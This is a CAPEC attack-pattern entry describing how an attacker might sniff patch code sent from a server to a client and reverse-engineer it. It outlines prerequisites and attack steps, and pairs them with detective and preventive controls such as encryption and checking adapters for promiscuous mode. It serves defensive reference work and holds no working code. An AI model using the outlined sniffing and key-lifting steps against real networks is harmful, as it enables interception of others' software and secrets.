CAPEC-259 - Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Patching

Attackers can capture application code bound for an authorized client during patching and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.

Severity

Likelihood

Confidentiality

Integrity

Availability

  • Attack Methods 2
  • API Abuse
  • Protocol Manipulation
  • Purposes 2
  • Exploitation
  • Reconnaissance
  • Scopes 4
  • "Varies by context"
  • Confidentiality
  • Modify files or directories
  • Integrity
  • Read files or directories
  • Confidentiality
  • Gain privileges / assume identity
  • Non-Repudiation
  • Authorization
  • Authentication
  • Accountability

Medium level: The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network.

High level: The attacker needs to reverse engineer the binary code if the need be.

The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted application must receive some patches from the server.

The Attacker needs the ability to capture communications between the client and server during patching. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client.

Step 1 - Set up a sniffer

The attacker sets up a sniffer in the path between the server and the client and watches the traffic..

Tecnique ID: 1 - Environment(s) env-ClientServer

The attacker sets up a sniffer in the path between the server and the client.

Security Control ID: 1

Type: Detective

Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode.

Security Control ID: 2

Type: Preventative

Encrypt all communications between the server and client.


Outcome ID: 1

Type: Success

The attacker successfully sets up a sniffer in the path between the server and client.

Outcome ID: 2

Type: Failure

The attacker could not set up a sniffer in the path between the server and client.



Step 1 - Capturing Application Code Bound During Patching

Attacker receives notification that the computer/OS/application has an available update for patching, loads the sniffer set up during Explore phase, and extracts patching code from subsequent communication. The attacker then proceeds to reverse engineer the captured code..

Tecnique ID: 1 - Environment(s) env-Web

Attacker loads the sniffer to capture the application code bound during patching.

Tecnique ID: 2 - Environment(s) env-All

The attacker proceeds to reverse engineer the captured code.

Indicator ID: 1 - Environment(s) env-Web

Type: Positive

The attacker can capture the application code bound for the target.

Indicator ID: 2 - Environment(s) env-Web

Type: Inconclusive

The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client.


Security Control ID: 1

Type: Detective

Check the network interface (e.g., ifconfig) to detect the sniffer.

Security Control ID: 2

Type: Preventative

Encrypt all communications between the server and client.


Outcome ID: 1

Type: Success

The attacker captures the application code bound for the target and reverse engineers the captured code.



Design: Encrypt all communication between the client and server.

Implementation: Use SSL, SSH, SCP.

Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.